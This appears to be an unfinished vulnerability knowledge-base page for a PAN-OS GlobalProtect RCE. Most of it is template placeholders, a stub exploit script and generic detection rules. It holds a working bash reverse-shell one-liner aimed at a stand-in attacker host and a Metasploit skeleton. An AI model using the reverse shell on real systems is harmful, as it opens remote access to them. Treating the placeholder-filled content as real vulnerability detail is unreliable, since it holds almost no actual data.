Malleum Knowledge Base

Palo Alto PAN-OS GlobalProtect RCE

3 min read

Overview

Palo Alto Networks PAN-OS, GlobalProtect gateway feature on permieter firewalls.

Affected Systems

Vulnerable Versions

VendorProductAffected VersionsFixed Version
[VENDOR][PRODUCT][X.X - X.X][X.X] or TBA

Platform-Specific Details

Operating Systems:

  • Windows
  • Linux
  • macOS
  • All platforms

Common Affected Applications:

  • Application 1
  • Application 2
  • Application 3

Prerequisites:

  • Prerequisite 1
  • Prerequisite 2
  • Prerequisite 3

Technical Analysis

Root Cause

Arbitrary File creation OS Command Injection on the firewall via crafted GlobalProtect requests (no auth)

Scanning Tools

# Nmap
nmap --script [SCRIPT_NAME] -p [PORT] [TARGET]
 
# Nuclei
nuclei -t cves/[YEAR]/CVE-YYYY-XXXXX.yaml -u [TARGET]

Exploitation

Detection

Check if system is vulnerable:

# Linux detection commands
[DETECTION_COMMAND]
 
# Windows detection commands
[DETECTION_COMMAND]

Version checking:

# Check version
[VERSION_CHECK_COMMAND]

Proof of Concept (PoC)

Ethical Use Only This PoC is for authorized testing only. Unauthorized access is illegal.

Method 1: [EXPLOITATION_METHOD_NAME]

Step 1: [DESCRIPTION]

# Commands
[EXPLOIT_COMMANDS]

Step 2: [DESCRIPTION]

# Commands
[EXPLOIT_COMMANDS]

Step 3: Verify success

# Verification
[VERIFICATION_COMMANDS]

Method 2: Using Metasploit (if applicable)

msfconsole
use exploit/[MODULE_PATH]
set RHOSTS [TARGET_IP]
set LHOST [ATTACKER_IP]
set LPORT 4444
exploit

Exploitation Code

#!/usr/bin/env python3
"""
CVE-YYYY-XXXXX Exploit
Author: [YOUR_NAME]
Description: [BRIEF_DESCRIPTION]
"""
 
import requests
import sys
 
def exploit(target, command):
    """
    Exploit CVE-YYYY-XXXXX
    """
    payload = {
        # Craft your payload
    }
    
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "Mozilla/5.0"
    }
    
    try:
        response = requests.post(
            f"{target}/vulnerable-endpoint",
            json=payload,
            headers=headers,
            timeout=10
        )
        
        print(f"[+] Status: {response.status_code}")
        print(f"[+] Response: {response.text}")
        
    except Exception as e:
        print(f"[-] Error: {e}")
 
if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python3 exploit.py <target_url>")
        sys.exit(1)
    
    exploit(sys.argv[1], "id")

Payload Examples

Basic payload:

[BASIC_PAYLOAD]

Reverse shell (Linux):

bash -c 'bash -i >& /dev/tcp/ATTACKER-IP/4444 0>&1'

Reverse shell (Windows):

[WINDOWS_REVERSE_SHELL]

Detection & Monitoring

Indicators of Compromise (IoCs)

Network Indicators:

IP Addresses:
- [MALICIOUS_IP_1]
- [MALICIOUS_IP_2]

Domains:
- [MALICIOUS_DOMAIN]

User-Agents:
- [MALICIOUS_USER_AGENT]

File Indicators:

File Hashes (SHA256):
- [HASH_1]

File Paths:
- [SUSPICIOUS_FILE_PATH]

Process Indicators:

  • [SUSPICIOUS_PROCESS_1]
  • [SUSPICIOUS_PROCESS_2]

Detection Rules

Sigma Rule

title: CVE-YYYY-XXXXX Exploitation Attempt
id: [GENERATE_UUID]
status: experimental
description: Detects exploitation attempts for CVE-YYYY-XXXXX
references:
    - https://nvd.nist.gov/vuln/detail/CVE-YYYY-XXXXX
author: [YOUR_NAME]
date: YYYY-MM-DD
logsource:
    category: [LOG_CATEGORY]
    product: [PRODUCT]
detection:
    selection:
        field1: 'value1'
        field2: 'value2'
    condition: selection
falsepositives:
    - [FALSE_POSITIVE_1]
level: [critical/high/medium]
tags:
    - attack.[TACTIC]
    - attack.[TECHNIQUE]
    - cve.YYYY.XXXXX

Snort Rule

alert tcp any any -> any [PORT] (msg:"CVE-YYYY-XXXXX Exploitation Attempt"; 
content:"[PATTERN]"; 
flow:to_server,established; 
classtype:attempted-admin; 
sid:[SID]; 
rev:1;)

Log Analysis

What to look for:

  • [LOG_INDICATOR_1]
  • [LOG_INDICATOR_2]
  • [LOG_INDICATOR_3]

Example log entry:

[YYYY-MM-DD HH:MM:SS] [LOG_ENTRY_EXAMPLE]

Remediation

Immediate Actions

  1. [ ] Identify affected systems

    # Commands to identify
[IDENTIFICATION_COMMANDS]

  2. [ ] Isolate affected systems

    # Isolation commands
[ISOLATION_COMMANDS]

  3. [ ] Review logs for exploitation

    # Log review commands
[LOG_REVIEW_COMMANDS]

Patching

Vendor Patches

VendorAdvisoryPatch LinkStatus
[VENDOR][ADVISORY_ID][LINK][STATUS]

Manual Patching

# Linux
[LINUX_PATCH_COMMANDS]
 
# Windows
[WINDOWS_PATCH_COMMANDS]

Verification

# Verify patch is applied
[VERIFICATION_COMMANDS]

Workarounds

Option 1: [WORKAROUND_NAME]

# Workaround commands
[WORKAROUND_COMMANDS]

Option 2: [ALTERNATE_WORKAROUND]

# Alternate workaround
[ALTERNATE_COMMANDS]

Long-term Mitigations

  • Mitigation 1
  • Mitigation 2
  • Mitigation 3
  • Mitigation 4
  • Mitigation 5

MITRE ATT&CK Mapping

Tactics:

Techniques:

Sub-techniques:

  • T0000.001 - [SUB_TECHNIQUE_NAME]

References

Official Sources

  1. NVD - CVE-YYYY-XXXXX
  2. MITRE - CVE-YYYY-XXXXX
  3. Vendor Advisory

Technical Analysis

  1. Analysis 1
  2. Analysis 2

Exploits & PoCs

  1. GitHub - PoC
  2. ExploitDB

Research Papers

  1. Paper 1
  2. Blog Post

Graph View